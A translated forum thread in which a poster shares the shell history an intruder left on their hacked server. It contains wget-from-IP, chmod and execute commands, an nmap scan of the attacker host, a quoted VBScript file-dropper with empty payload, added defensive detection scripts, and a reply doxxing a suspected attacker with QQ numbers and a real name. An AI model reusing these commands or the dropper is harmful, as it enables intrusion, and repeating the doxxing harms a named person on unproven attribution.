Server hacked two days in a row: the first time it was used for mining, yesterday they came back, and unlike the first time there is actually a history record this time. Sharing it with you guys purely for laughs.

2020-01-07 09:48:18 +08:00
 dothis

Starts at 17:01

In case the image above goes dead, here is the text:

21 2020-01-06 09:44:38 crontab -e
22 2020-01-06 09:45:16 reboot
23 2020-01-06 09:47:02 top
24 2020-01-06 17:01:03 top
25 2020-01-06 17:01:11 ls -l /proc/3557/exe
26 2020-01-06 17:01:17 netstat -atulnp
27 2020-01-06 17:01:40 ls -l /proc/1211/exe
28 2020-01-06 17:01:44 kill -9 1211
29 2020-01-06 17:01:46 crontab -l
30 2020-01-06 17:01:47 crontab -r
31 2020-01-06 17:01:48 crontab -l
32 2020-01-06 17:01:50 cd /usr/bin/
33 2020-01-06 17:01:57 rm -rf ftucwfvnpb
34 2020-01-06 17:02:00 netstat -atulnp
35 2020-01-06 17:02:03 w
36 2020-01-06 17:02:05 cd /root/
37 2020-01-06 17:02:07 cd /bin/
38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java
39 2020-01-06 17:02:19 rm -rf java.1
40 2020-01-06 17:02:20 cd /root/
41 2020-01-06 17:02:21 cd /opt/
42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java
43 2020-01-06 17:02:35 chmod 777 java
44 2020-01-06 17:02:36 ./java
45 2020-01-06 17:02:38 cd /root/
46 2020-01-06 17:02:41 ps -xua
47 2020-01-06 17:03:28 netstat -atulnp
48 2020-01-06 17:03:47 kill -9 4689
49 2020-01-06 17:03:51 netstat -atulnp
50 2020-01-06 17:04:02 cd /etc/
51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163
52 2020-01-06 17:04:15 rm -rf java
53 2020-01-06 17:04:16 cd /root/
54 2020-01-06 17:04:17 cd /bin/
55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java
56 2020-01-06 17:04:28 rm -rf java.1
57 2020-01-06 17:04:30 cd /root/
58 2020-01-06 17:04:31 cd /opt/
59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java
60 2020-01-06 17:04:36 chmod 777 java
61 2020-01-06 17:04:39 ./java
62 2020-01-06 17:04:42 cd /root/
63 2020-01-06 17:04:44 netstat -atulnp
64 2020-01-06 17:04:51 ifconfig
65 2020-01-06 17:04:54 history
66 2020-01-06 17:05:01 netstat -atulnp
67 2020-01-06 17:05:42 cd /ro
68 2020-01-06 17:05:43 cd /root/
69 2020-01-06 17:05:46 history
70 2020-01-06 17:05:53 ifconfig
71 2020-01-06 17:05:54 history
72 2020-01-06 17:05:58 w
73 2020-01-06 17:06:00 history
74 2020-01-06 17:06:24 ifconfig
75 2020-01-06 17:06:27 history
76 2020-01-06 17:06:29 history
77 2020-01-06 17:06:29 history

24847 views · Node: 程序员 (Programmers) · 66 replies
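As an added example (not from the original post, and not anything the OP ran), here is the kind of triage a defender would do over a timestamped history like the one above: it parses the lines that `history` prints when HISTTIMEFORMAT is set, tags each command against a small set of post-compromise indicators (resolving a PID's binary, killing PIDs, wiping the crontab, fetching a file from a bare IP, chmod followed by execution, checking history), and links a download to the chmod and execution of the same file name within a time window. The sample lines are a subset copied from the OP's history; the rule set, the window and the chain logic are my own assumptions.

```python
"""Triage a bash history that carries HISTTIMEFORMAT timestamps.

Added example: the rules and the drop-chain logic are my own assumptions, not
anything from the thread; the sample lines are copied from the OP's history.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime

# Subset of the history posted in the thread (constructed sample input).
SAMPLE_HISTORY = """\
24 2020-01-06 17:01:03 top
25 2020-01-06 17:01:11 ls -l /proc/3557/exe
27 2020-01-06 17:01:40 ls -l /proc/1211/exe
28 2020-01-06 17:01:44 kill -9 1211
29 2020-01-06 17:01:46 crontab -l
30 2020-01-06 17:01:47 crontab -r
33 2020-01-06 17:01:57 rm -rf ftucwfvnpb
42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java
43 2020-01-06 17:02:35 chmod 777 java
44 2020-01-06 17:02:36 ./java
65 2020-01-06 17:04:54 history
"""

# "<n> <YYYY-MM-DD HH:MM:SS> <command>": the shape `history` prints with
# HISTTIMEFORMAT='%F %T '.
LINE_RE = re.compile(r"^\s*(\d+)\s+(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(.*)$")

# (tag, pattern) pairs; each flags one thing an intruder tidying up a box does.
RULES = [
    ("proc_exe_lookup", re.compile(r"/proc/\d+/exe")),       # resolving a PID's binary
    ("force_kill", re.compile(r"\bkill\s+-9\b")),             # killing a rival process
    ("cron_wipe", re.compile(r"\bcrontab\s+-r\b")),           # removing every cron job
    ("download_by_ip", re.compile(r"\b(?:wget|curl)\b.*https?://\d{1,3}(?:\.\d{1,3}){3}")),
    ("make_executable", re.compile(r"\bchmod\s+(?:777|\+x|a\+x)\b")),
    ("run_from_cwd", re.compile(r"^\./\S+")),                 # ./something
    ("history_check", re.compile(r"^history$")),              # looking at what was recorded
]


@dataclass
class Entry:
    number: int
    ts: datetime
    cmd: str
    hits: list = field(default_factory=list)


def parse_history(text):
    """Parse timestamped history lines; lines that do not fit are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(2), "%Y-%m-%d %H:%M:%S")
            entries.append(Entry(int(m.group(1)), ts, m.group(3)))
    return entries


def tag_entries(entries):
    """Attach the names of every rule that matches each command."""
    for e in entries:
        e.hits = [tag for tag, rx in RULES if rx.search(e.cmd)]
    return entries


def download_chains(entries, window_seconds=300):
    """Link 'download X' -> 'chmod X' -> './X' when all happen within the window."""
    chains = []
    for i, dl in enumerate(entries):
        if "download_by_ip" not in dl.hits:
            continue
        name = dl.cmd.rstrip("/").rsplit("/", 1)[-1]   # last path component of the URL
        chmod = None
        for later in entries[i + 1:]:
            if (later.ts - dl.ts).total_seconds() > window_seconds:
                break
            if chmod is None and "make_executable" in later.hits and later.cmd.split()[-1] == name:
                chmod = later
            elif chmod is not None and "run_from_cwd" in later.hits and later.cmd.split()[0] == "./" + name:
                chains.append((dl, chmod, later))
                break
    return chains


def triage(text, window_seconds=300):
    """Summarise one history: size, flagged entries, drop chains, session span."""
    entries = tag_entries(parse_history(text))
    if not entries:
        return {"total": 0, "flagged": [], "chains": [], "span_seconds": 0}
    return {
        "total": len(entries),
        "flagged": [e.number for e in entries if e.hits],
        "chains": [(dl.number, ch.number, run.number)
                   for dl, ch, run in download_chains(entries, window_seconds)],
        "span_seconds": int((entries[-1].ts - entries[0].ts).total_seconds()),
    }


if __name__ == "__main__":
    for e in tag_entries(parse_history(SAMPLE_HISTORY)):
        if e.hits:
            print(f"{e.number:>4} {e.ts:%H:%M:%S} {e.cmd:<45} {','.join(e.hits)}")
    print(triage(SAMPLE_HISTORY))
```

The defensive point behind this: the only reason the OP has anything to triage is that the intruder's interactive shell kept writing a timestamped history. Setting HISTTIMEFORMAT is cheap, but history is trivially cleared by whoever owns the shell, so the version of this that survives a second visit ships the same signal off-host (auditd execve records or equivalent process-execution telemetry) instead of relying on the file in /root.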
songco
2020-01-07 15:16:55 +08:00
Starting Nmap ( https://nmap.org ) at 2020-01-07 09:14 EET
NSE: Loaded 40 scripts for scanning.
Initiating Ping Scan at 09:14
Scanning 101.201.76.232 [4 ports]
Completed Ping Scan at 09:14, 0.47s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:14
Scanning 101.201.76.232 [100 ports]
Discovered open port 1025/tcp on 101.201.76.232
Discovered open port 139/tcp on 101.201.76.232
Discovered open port 135/tcp on 101.201.76.232
Discovered open port 80/tcp on 101.201.76.232
Discovered open port 3389/tcp on 101.201.76.232
Discovered open port 1027/tcp on 101.201.76.232
Discovered open port 1026/tcp on 101.201.76.232
Completed SYN Stealth Scan at 09:14, 2.94s elapsed (100 total ports)
Initiating Service scan at 09:14
Scanning 7 services on 101.201.76.232
Completed Service scan at 09:15, 59.26s elapsed (7 services on 1 host)
NSE: Script scanning 101.201.76.232.
Initiating NSE at 09:15
Completed NSE at 09:15, 2.96s elapsed
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Nmap scan report for 101.201.76.232
Host is up (0.21s latency).
Not shown: 77 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.9.12
81/tcp filtered hosts2-ns
111/tcp filtered rpcbind
119/tcp filtered nntp
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
427/tcp filtered svrloc
445/tcp filtered microsoft-ds
515/tcp filtered printer
646/tcp filtered ldp
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1029/tcp filtered ms-lsa
3389/tcp open ms-wbt-server Microsoft Terminal Service
4899/tcp filtered radmin
5000/tcp filtered upnp
5101/tcp filtered admdog
5357/tcp filtered wsdapi
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6001/tcp filtered X11:1
49152/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.38 seconds
Raw packets sent: 182 (7.984KB) | Rcvd: 137 (5.516KB)
randomtree451
2020-01-07 15:30:07 +08:00
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
tengyoubiao
2020-01-07 15:50:25 +08:00
So a trojan that infects HTML pages was planted on it?
Achiii
2020-01-07 16:43:09 +08:00
I've had a site get a trojan planted through a tp vulnerability; solved it later by filtering keywords in the POST parameters.
black11black
2020-01-07 21:23:08 +08:00
Bro, what's the command you used to view the user's command history?
wqshare
2020-01-07 21:31:36 +08:00
Take a look at this guy's page on port 80: somebody planted a trojan on it with VBS, haha
xupefei
2020-01-07 21:44:37 +08:00
Don't expose the yarn port to the public internet.
rootx
2020-01-07 22:11:35 +08:00
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
dorothyREN
2020-01-08 00:55:30 +08:00
@dothis #37 No database backup, only logs; restoring was painfully slow, it took two days to get the data back.
msg7086
2020-01-08 01:46:06 +08:00
Installing 宝塔 (BT Panel) on a company server? Respect, respect.
HTSdTt3WygdgQQGe
2020-01-08 02:12:03 +08:00
Report it to the police right away, say the database lost confidential data worth 100 million, and let Ali investigate.
vvqqdd
2020-01-08 04:11:58 +08:00
This server has an image; open it and it's a picture of a bro 🐎, the file is called nknmn... the name says it all, haha
KasuganoSoras
2020-01-08 04:56:49 +08:00
I saw an image on his server called "战鹰部落 MC 服务器" (Zhanying Tribe MC server). I happen to run an MC server too, so out of curiosity I searched and found their server: the QQ group is 139888565, the group owner's QQ is 565621504, nickname NullPointerException. Combined with the commands executed earlier and the file names all containing Java, I'd say it's pretty much certain. OP, if you're interested you could go meet him yourself?
KasuganoSoras
2020-01-08 05:04:08 +08:00
https://www.mcbbs.net/thread-675592-1-1.html
Back in 2017 he posted on the Minecraft Chinese forum saying his server had been hit with a 9.6Gbps DDoS. From his profile space I found a domain, www.zhanyingwl.com; opening it gave a 502, the 360 Cloud Shield page. Then I figured that since he uses 360's CDN the domain must have an ICP filing, so I looked up the filing number, and sure enough:
尹伊君 (individual) 鲁 ICP 备 18039840 号-1 战鹰网络技术站 www.zhanyingwl.com
That's as far as I can help you (lol)
cydian
2020-01-08 06:12:17 +08:00
@KasuganoSoras It opens fine, it's not a 502
webshe11
2020-01-08 08:17:53 +08:00
So you really did use 宝塔, huh
Pzqqt
2020-01-08 08:58:35 +08:00
@xmi See reply #38: the virus is hidden in the page source. At the bottom of the page source there is a piece of malicious VBScript, and you can tell from the code that it only affects Windows systems.
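As an added example (not code from the thread, and not from any project), here is a small Python scanner a defender could run over a web root or over fetched pages to spot the dropper pattern quoted in reply #38: a VBScript block that creates a Scripting.FileSystemObject, writes a hex-decoded payload into the temp folder (GetSpecialFolder(2)) under a system-looking file name, and launches it hidden through WScript.Shell. The sample infected page, the clean page and the short WriteData hex string are constructed for the test; in the copies posted in the thread WriteData is empty. Indicator names and the three-indicator threshold are my own choices.

```python
"""Scan HTML for an injected VBScript file-dropper block.

Added example: detection logic only, not code from the thread or any project.
"""
import re

# Constructed sample: a benign page with the dropper block appended, modelled on
# the script quoted in the thread. The hex in WriteData is made up (the posted
# copies have it empty) and only long enough to show payload extraction.
SAMPLE_INFECTED = r"""<html><body><h1>hello</h1>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
</body></html>"""

# Constructed clean page: VBScript present, but nothing dropper-like.
SAMPLE_CLEAN = '<html><script language="vbscript">MsgBox "hello"</script></html>'

# Any <script> tag declared as VBScript (language= or type=), body captured.
SCRIPT_RE = re.compile(
    r"<script\b[^>]*\b(?:language|type)\s*=\s*[\"']?(?:text/)?vbscript[\"']?[^>]*>(.*?)</script\s*>",
    re.I | re.S,
)

# One indicator per step of the drop-and-run chain, scored independently so
# renaming a variable does not defeat the check.
INDICATORS = {
    "filesystem_object": re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "temp_folder": re.compile(r"GetSpecialFolder\(\s*2\s*\)", re.I),   # 2 = TemporaryFolder
    "hex_decode_loop": re.compile(r'Chr\(\s*CLng\(\s*"&H"\s*&\s*Mid\(', re.I),
    "wscript_shell": re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.I),
    "hidden_run": re.compile(r"\.Run\s+\w+\s*,\s*0\b", re.I),           # window style 0 = hidden
}
DROP_NAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.I)
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]*)"', re.I)


def scan_html(html, min_indicators=3):
    """Return one finding per VBScript block that matches enough indicators."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if len(hits) < min_indicators:
            continue
        name = DROP_NAME_RE.search(body)
        data = WRITEDATA_RE.search(body)
        hex_payload = data.group(1) if data else ""
        # Same decoding the script performs (two hex digits per byte), so the
        # analyst gets the would-be file without ever executing the block.
        payload = bytes.fromhex(hex_payload) if len(hex_payload) % 2 == 0 else b""
        findings.append({
            "offset": m.start(),
            "indicators": hits,
            "drop_name": name.group(1) if name else None,
            "payload_len": len(payload),
            "looks_like_pe": payload[:2] == b"MZ",
        })
    return findings


if __name__ == "__main__":
    for label, page in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(label, scan_html(page))
```

Scoring several independent indicators rather than matching the whole block verbatim is deliberate: the variable names in the injected copy are arbitrary, but creating a FileSystemObject, targeting the temp folder, hex-decoding into a file and running it with window style 0 are the steps the technique cannot do without. Feeding the scanner every file under the web root, or the body of each page as served, catches the injection whether it lives in a static file or is appended by a compromised template.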
dothis
2020-01-08 08:58:44 +08:00
@black11black Just type history in the terminal and you can see it.
@msg7086 I use it on my own server and it feels really comfortable, so I wanted to use it on the company server too; in the end it never really got used and went cold. I won't dare use this kind of thing again in the future; it's fine for playing around on my own.
@dorothyREN ... that's rough. I have snapshots on my side, which makes it a lot simpler.
@KasuganoSoras Holy crap, you're solid, bro. Thanks a lot.
qanniu
2020-01-08 08:59:19 +08:00
@KasuganoSoras Boss, v5
xiaoxiongmao
2020-01-08 09:14:18 +08:00
@KasuganoSoras Impressive, bro

https://www.v2ex.com/t/635675